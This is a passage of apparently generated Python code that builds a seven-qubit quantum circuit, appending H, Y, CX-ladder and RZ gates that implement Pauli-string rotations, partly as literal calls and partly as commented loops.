sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
# Final four basis-sandwich passes for the RZ(4.511343) rotation on
# qubit 0 (the first passes precede this chunk).  Each pass applies H/Y
# pre-rotations on qubits (6, 3, 0, 0), folds parity down to qubit 0
# through a CX ladder, applies the RZ, mirrors the ladder, and repeats
# the identical pre-rotations.  (Looks like one Pauli-string exponential
# of a generated ansatz -- TODO confirm against the generator.)
_targets = (6, 3, 0, 0)
_ladder = ((6, 5), (5, 4), (4, 3), (3, 2), (2, 1), (1, 0))
for _pat in ("YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(4.511343, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(2.655704) rotation on qubit 1.
# Each pass: H/Y pre-rotations on qubits (6, 3, 1, 1), CX ladder down to
# qubit 1, RZ, mirrored ladder, then the same pre-rotations again.
_targets = (6, 3, 1, 1)
_ladder = ((6, 5), (5, 4), (4, 3), (3, 2), (2, 1))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(2.655704, 1))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(5.354909) rotation on qubit 0.
# Pre/post rotations act on qubits (6, 4, 0, 0); the parity ladder skips
# qubits 3 and 2 (6->5->4->1->0).
_targets = (6, 4, 0, 0)
_ladder = ((6, 5), (5, 4), (4, 1), (1, 0))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.354909, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(1.150055) rotation on qubit 0.
# Pre/post rotations act on qubits (6, 4, 0, 0); the parity ladder skips
# qubit 3 (6->5->4->2->1->0).
_targets = (6, 4, 0, 0)
_ladder = ((6, 5), (5, 4), (4, 2), (2, 1), (1, 0))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(1.150055, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(5.886901) rotation on qubit 1.
# Pre/post rotations act on qubits (6, 4, 1, 1); ladder 6->5->4->2->1.
_targets = (6, 4, 1, 1)
_ladder = ((6, 5), (5, 4), (4, 2), (2, 1))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.886901, 1))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
# Eight basis-sandwich passes for the RZ(0.1612143) rotation on qubit 0.
# Pre/post rotations act on qubits (6, 4, 0, 0); full ladder 6->...->0.
_targets = (6, 4, 0, 0)
_ladder = ((6, 5), (5, 4), (4, 3), (3, 2), (2, 1), (1, 0))
for _pat in ("HHHH", "YYYY", "HYHY", "YHYH", "YYHH", "HHYY", "YHHY", "HYYH"):
    for _g, _q in zip(_pat, _targets):
        sim.append(sim.H(_q) if _g == "H" else sim.Y(_q))
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(0.1612143, 0))
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
